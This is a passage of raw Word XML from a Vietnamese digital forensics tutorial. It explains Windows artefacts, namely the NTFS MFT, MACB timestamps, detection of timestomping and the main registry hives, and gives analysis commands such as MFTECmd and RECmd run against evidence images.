          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NTFS, Registry, Event Logs, Prefetch và LNK - Windows để lại dấu vết ở khắp nơi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6CE2E">
      <w:pPr>
        <w:pStyle w:val="3"/>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Windows là hệ điều hành giàu dấu vết pháp chứng nhất. Gần như mọi hành động người dùng, sự kiện hệ thống và lần thực thi chương trình đều có thể để lại thông tin trong nhiều nguồn artefact. Kỹ năng cốt lõi của chuyên viên là biết chúng nằm ở đâu, cho biết điều gì và trích xuất bằng cách nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699ECE69">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="ntfs-master-file-table---mft"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1. NTFS Master File Table - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$MFT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54759D71">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Mỗi tệp và thư mục trên volume NTFS đều có bản ghi trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$MFT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, chứa tên tệp, kích thước, dấu thời gian MACB, quyền và vị trí cluster dữ liệu. Kể cả khi tệp đã bị xóa, bản ghi MFT có thể vẫn còn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE3F91">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>analyzeMFT</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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/MFT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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/mft_analysis.csv</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icat</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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2048 evidence.E01 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/MFT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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MFTECmd.exe</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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> MFT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>--csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> output/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>--csvf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mft_output.csv</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:p w14:paraId="2D2816BB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="dấu-thời-gian-macb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.2. Dấu thời gian MACB</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2142"/>
        <w:gridCol w:w="7904"/>
      </w:tblGrid>
      <w:tr w14:paraId="78949FA1">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5E44006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Ký hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FE80D5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Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D6DD6C8">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710CC9C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M - Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A00334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 xml:space="preserve">Lần cuối </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>nội dung</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> tệp thay đổi; bằng chứng chỉnh sửa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="507BC366">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53B67BC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A - Accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4770407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Lần cuối tệp được mở hoặc đọc; bằng chứng truy cập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65E5B387">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2A93C0C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 - Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D82ED2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Lần cuối bản ghi MFT thay đổi, ví dụ đổi tên, quyền hoặc metadata.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36D59FC3">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5DC5356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B - Born/Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CE17C6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Thời điểm tệp được tạo lần đầu trên volume hiện tại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3726442D">
      <w:pPr>
        <w:pStyle w:val="3"/>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Kẻ tấn công có thể sửa các giá trị MACB bằng công cụ như </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>timestomp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. NTFS thường có hai bộ dấu thời gian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CD518">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$STANDARD_INFORMATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Bộ thời gian Windows Explorer hiển thị, dễ bị công cụ user-mode sửa hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A05F69">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$FILE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Bộ thời gian thứ hai trong MFT, khó sửa hơn. So sánh hai bộ để tìm bất nhất.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:p w14:paraId="3314D78C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="Xf2c601b6927d910b4c0dd5f56899ca82120baaf"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.3. Windows Registry - bản đồ kho báu pháp chứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372E107">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Registry là cơ sở dữ liệu phân cấp lưu cấu hình hệ thống và người dùng. Nó ghi nhận phần mềm đã cài, thiết bị USB, tệp truy cập gần đây, hoạt động người dùng và cơ chế persistence.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2095"/>
        <w:gridCol w:w="7951"/>
      </w:tblGrid>
      <w:tr w14:paraId="50543E3D">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0C05745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Hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="028D79A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Giá trị pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="58E67FE9">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242CB13E">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SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C6DA9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Cấu hình hệ thống, dịch vụ, driver, giao diện mạng và múi giờ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13BEE2FE">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38BFBEFD">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SOFTWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1787CFC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Phần mềm cài đặt, phiên bản hệ điều hành, thiết lập Windows và ứng dụng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5845687C">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2CECA928">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SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45E717C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 xml:space="preserve">Tài khoản cục bộ và NTLM hash; cần quyền truy cập phù hợp cùng hive </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>SYSTEM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7482B80C">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7AF6E0EA">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SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B66821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Chính sách bảo mật, credential cache và thiết lập audit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DFFE7C8">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21D1A27">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NTUSER.DAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15551D5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Hive theo người dùng: RecentDocs, lịch sử tìm kiếm, TypedURLs, RunMRU và UserAssist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A716376">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649CEAD2">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USRCLASS.DAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13AFC8B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Shellbags: lịch sử truy cập thư mục, kể cả thư mục đã xóa và network share.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BC534B5">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ro,loop,offset=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2048</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidence.E01 /mnt/evidence/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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>RECmd.exe</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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> NTUSER.DAT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--bn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> BatchExamples/Kroll_Batch_MC.reb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--csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> output/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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>reg_decode.py</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-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> NTUSER.DAT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-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
